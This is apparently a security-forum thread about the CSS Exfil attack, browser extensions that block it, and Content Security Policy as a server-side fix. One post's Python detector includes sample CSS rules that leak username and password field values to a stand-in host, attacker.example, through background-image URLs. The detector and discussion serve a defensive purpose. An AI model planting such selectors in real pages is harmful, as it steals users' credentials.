Protect yourself against a pure CSS data stealing attack called Exfil

shmu26

CSS Exfil Protection is a browser extension for Mozilla Firefox and Google Chrome that protects data against CSS Exfil attacks.

Internet users who have a good understanding of online security know that JavaScript is a great technology but also something that can be used in attacks. There are plenty of solutions available to deal with JavaScript-based attacks including using content blockers like uBlock Origin, extensions like NoScript that block JavaScript executions, or disabling JavaScript outright (the latter is not very practical).

An attack, named CSS Exfil (from exfiltrate), uses CSS to steal data. Mike Gualtieri, the researcher who discovered the vulnerability, published several proof of concept attacks designed to steal usernames, passwords, and other data on web pages where it is used.

Mike Gualtieri created a vulnerability tester that returns whether the web browser is vulnerable to CSS Exfil attacks. Just visit the web page in question to see if the browser is vulnerable or not. The page is just testing the vulnerability but not abusing it in any way.

What makes the attack particularly problematic is that it does not rely on JavaScript and that browsers don't offer any form of protection against it.


 

shmu26

Add more extensions and some people will disagree.

Anyway, I have this extension protecting my browsers... you know my "having more extensions" style.
This one says it is offering a unique protection, although I haven't heard much about this type of attack. Anyone?
 

Local Host

This one says it is offering a unique protection, although I haven't heard much about this type of attack. Anyone?
This attack vector was actually discovered last year.

Using CSP will patch this exploit server side, but most website designers are either lazy or lack the knowledge to do so (there are lots of webmasters that don't even know what CSP is, let alone implement it).

Client side is a different story: the browser itself needs to block remote URLs.

You can find detailed information here: Stealing Data With CSS: Attack and Defense
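The post above makes two points: the server-side fix is a Content Security Policy, and the client-side fix is to refuse the remote URL that a malicious stylesheet tries to load. The following is an added example written for this thread (not code from the CSS Exfil Protection extension, from Mike Gualtieri, or from the linked article) that shows both checks on a constructed stylesheet. The stylesheet, the host `attacker.example`, and the page origin `https://www.example.com` are made-up sample values, and the CSP matching is a deliberately simplified subset of the real `img-src` / `default-src` semantics.

```python
import re
from urllib.parse import urlsplit

# Constructed sample stylesheet (not from any real site): one benign rule and two
# rules of the shape the extension warns about, i.e. an attribute-value selector on
# a form field whose declaration loads an image from a remote host.
SAMPLE_CSS = """
.btn { background: url(/static/btn.png); }
input[name="username"][value^="a"] { background-image: url("https://attacker.example/log?u=a"); }
input[type="password"][value$="z"] { background: url(https://attacker.example/p?z); }
"""

# A rule is "selector { declarations }"; nested at-rules are out of scope here.
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}")
# Selectors that match on a field's value attribute, or that use the prefix /
# suffix / substring operators on any attribute.
SUSPICIOUS_ATTR_RE = re.compile(r"\[\s*(?:value\s*[\^$*]?=|[\w-]+\s*[\^$*]=)")
# url(...) with or without quotes around the address.
URL_RE = re.compile(r"url\(\s*[\"']?([^\"')]+)[\"']?\s*\)", re.I)


def find_exfil_rules(css, allowed_hosts):
    """Return (selector, url) pairs for rules that both match on attribute values
    and fetch a resource from a host outside allowed_hosts."""
    findings = []
    for m in RULE_RE.finditer(css):
        selector, body = m.group(1).strip(), m.group(2)
        if not SUSPICIOUS_ATTR_RE.search(selector):
            continue
        for url in URL_RE.findall(body):
            host = urlsplit(url).hostname  # None for relative URLs
            if host and host not in allowed_hosts:
                findings.append((selector, url))
    return findings


# Server-side answer: styles and style-triggered fetches only from the site itself.
RECOMMENDED_CSP = "default-src 'self'; style-src 'self'; img-src 'self'; font-src 'self'"


def csp_allows_image(csp, url, page_origin):
    """Simplified check: does the img-src directive (falling back to default-src,
    then to 'allow everything') permit loading url from a page at page_origin?"""
    directives = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0]] = tokens[1:]
    sources = directives.get("img-src") or directives.get("default-src") or ["*"]
    parts = urlsplit(url)
    url_origin = f"{parts.scheme}://{parts.netloc}"
    for src in sources:
        if src == "*" or (src.lower() == "https:" and parts.scheme == "https"):
            return True
        if src == "'self'" and url_origin == page_origin:
            return True
        if src == url_origin or src == parts.hostname:
            return True
    return False


if __name__ == "__main__":
    page_origin = "https://www.example.com"
    for selector, url in find_exfil_rules(SAMPLE_CSS, {"www.example.com"}):
        blocked = not csp_allows_image(RECOMMENDED_CSP, url, page_origin)
        print(f"suspicious rule: {selector} -> {url} (blocked by CSP: {blocked})")
```

Run as a script it reports the two value-matching rules and shows that the recommended policy would refuse their image loads, while the first-party button image stays allowed; with a permissive policy such as `default-src *` the same loads go through, which is the "lazy or lack the knowledge" case the post describes.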
 

TairikuOkami

So the webpage has to be exploited first in order to be able to exploit the user. :unsure:

Utilize an injection flaw to add a fake password input into the page and use CSS Exfil to steal password.
I guess only if the password is saved within the browser or if there is password autofill involved?
 

Moonhorse

I added this extension to Chrome and visited some sites in hopes of getting an alert from the extension... oh well.

I have noscript + ublock origin in basilisk browser and noscript will prevent this attack anyways
 

Azure

I added this extension to chrome and visited some sites in hopes of getting alert by extension...oh well

I have noscript + ublock origin in basilisk browser and noscript will prevent this attack anyways
Are you sure?
 

Moonhorse

Are you sure?
There are plenty of solutions available to deal with JavaScript-based attacks including using content blockers like uBlock Origin, extensions like NoScript that block JavaScript executions, or disabling JavaScript outright

NoScript Security Suite is a browser extension for the Firefox web browser designed to give users control over the content that sites may run. The extension blocks JavaScript execution by default which improves security and privacy significantly. NoScript supports other features, XSS and clickjacking attack protections and other security enhancing features.


Noscript or umatrix are great extensions, probably even ublock origin will do on medium/hard mode
 

shmu26

NoScript Security Suite is a browser extension for the Firefox web browser designed to give users control over the content that sites may run. The extension blocks JavaScript execution by default which improves security and privacy significantly. NoScript supports other features, XSS and clickjacking attack protections and other security enhancing features.


Noscript or umatrix are great extensions, probably even ublock origin will do on medium/hard mode
Maybe you missed this line in the article:
What makes the attack particularly problematic is that it does not rely on JavaScript
 
